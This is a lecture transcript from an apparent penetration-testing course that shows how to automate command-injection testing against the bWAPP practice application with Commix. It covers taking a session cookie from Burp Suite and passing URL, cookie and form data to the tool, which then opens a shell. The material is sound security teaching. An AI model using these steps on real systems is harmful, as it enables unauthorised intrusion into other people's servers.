Command Injection & SSI
The course is part of this learning path
In this course, we continue working on bWAPP and we're going to use it to learn about some new attacks, namely command injection and SSI vulnerabilities.
Hi. Within this lecture, we're going to continue working on Command Injection but this time we're going to try and automize this process so that we can be fast and efficient, okay? Because it may take so much time to test everything in order to understand if we really have a command injection vulnerability in here or not. So, we're going to use a tool for that. And this tool is called Commix and it comes pre-installed within the Kali Linux. So, let me show you how it works. So, open terminal and write 'commix' this way, okay? So, c-o-m-m-i-x. So, as you can see our tool is installed and it's giving us an error because we haven't specified any parameters. So, in order to do that, we need to understand how this works. As you can see there are a lot of parameters over here like u, l, m. So, I'm going to run '-h' over here to see the help documentation, and as you can see it's a very comprehensive tool as well because we get a lot of options, a lot of parameters that we can work with. So, here you go. So, this is an all-in-one OS Command Injection and exploitation tool. So, it tries to find the OS Command Injections, okay? And if it can it opens a shell for you, so it will be automatically hacking into the website if there is an OS Command Injection possibility, okay? And of course, in your own time you can just wander around this help documentation and see the other usages and other parameters as well. But I'm going to show you the basics of this tool we need Burp Suite in this case. Actually, I'm going to show you why, because we need some cookie information to be robust in this case, because sometimes in websites you have to provide cookie with a request, otherwise it won't work, okay? For example we are no logged in and we can do this lookup thing, we can do the DNS lookup thing and they may have a filter if you are not logged in or if you don't have a cookie, it may not work for you, okay? You can get this cookie from the previous request that we have made within the previous lecture, okay? We can see all the requests and responses back in here in the commandi.php. We can see the POST request, we can see the GET request and stuff. And let me show you what we're going to do to get one of those. So, if you click one of them you can see we just went to the google.com and submit the form, but also there's a cookie in here, and this is the PHPSESSID, which is basically the ID of the cookie, and that's how it recognizes us. So, we need to get this PHP so that we can give it as an input as a parameter to Commix. So, again you can just get it from one of the POST requests that we made in the previous lecture or you can just intercept the request and see it for yourself so that you can just copy the PHPSESSID and give it as a parameter to Commix. Actually, maybe I don't know if we omit this thing, if we don't do it at all maybe it can work. If we don't give PHPSESSID a parameter, it can work in this case since it's a buggy application but in real life examples you're definitely going to need this. So, I'm just going to show you the way it's supposed to be not only the basics but also the details as well, like we do in most of the cases. So, maybe you have actually closed down the Burp Suite for some reason when you skip the lectures or maybe you haven't even watched the previous lecture. I don't know you just came to this website. So, we're working with this bWAPP application and we have seen how to do command injection in the previous lecture. So, try to find this commandi.php and your PHPSESSID will be different than mine. So, don't just try to pause the video and just copy and paste the thing, and give it as a parameter or hey it won't work. It changes every time as well. So, make sure you find your own PHPSESSID, okay? Now let's copy this. Let's just take this PHPSESSID value from here. Obviously, we want only this part, okay? Not this part or not the PHPSESSID part, just copy the thing that starts with F in here. Maybe it starts with something else with you, okay? And then we're going to need it in the Commix. So, let me go back and show you how it's used. So, we write 'commix' and first of all we need to specify the URL itself. So,' --url'. And it's going to be equal to this way, okay? So, make sure you include the quotation marks over here as well like this. So, paste them and close down the quotation mark. So, here you go. This is our URL that we're going to test the command injection on, okay? So, the next thing is to give the cookie information, okay? This is the PHPSESSID that we have been looking for. So, let me open the quotation mark and get the PHPSESSID one more time. So, let me just take all of these things with the PHPSESSID as well. I believe we have to take the security level as well. So, it's a part of the cookie, right? So, let me take everything over here and try it like that. So, let me paste this selection and here you go. So, this is my cookie information. And then we're going to specify a data, okay? And I will show you what the data is. All you have to say. '- - data', not '-data'. So, this data is the parameters that we're sending over here. So, this one. So, make sure you get this one and again if you cannot see this request from before you can just always intercept it and take the same parameters that I have been taking, okay? So, if it doesn't have this, if the commix doesn't have these parameters, then it won't work because it won't save. It won't actually send the correct requests to the server. So, I believe we went out of the quotation marks. So, I'm going to put over here and delete one from there, and here we go. So, we have the URL, we have the cookie, we have the data. So, it has every information that it needs to send to a server in order to test the command injections. So, after you do all of this thing you can hit 'Enter' and it will start testing for this stuff. So, as you can see it's already found for me. I don't know if it's going to be the same for you like speed wise. Maybe it can't take much time or if it asks you something like that, like yes or no. Just do the default option, okay? So, for example in this case, default option is as you can see 'Y' it's written in big characters, okay? Even though it doesn't accept it, just say 'Y' and hit 'Enter'. If it says 'No', just say no and hit 'Enter' and I believe we are already in the shell as you can see it is from the vulnerability it exploited it and it showed us the terminal directly. If you do question mark like this, you can see all the options available to you right now, okay? For example, if I run ls I can see all the details. So, this is basically a shell. It's a commix shell, but you can run all the comments that you may want to run on a Linux server, okay? So, that's how it works. Great. So, this is a way to automize the system, don't trust on the automized systems every time. You have to try your own way like manually to understand first. And if you cannot find anything then you can move on to automated systems, but don't rely only on the automized systems in web pentesting in general. So, we're going to stop here and continue within the next one.
Atil is an instructor at Bogazici University, where he graduated back in 2010. He is also co-founder of Academy Club, which provides training, and Pera Games, which operates in the mobile gaming industry.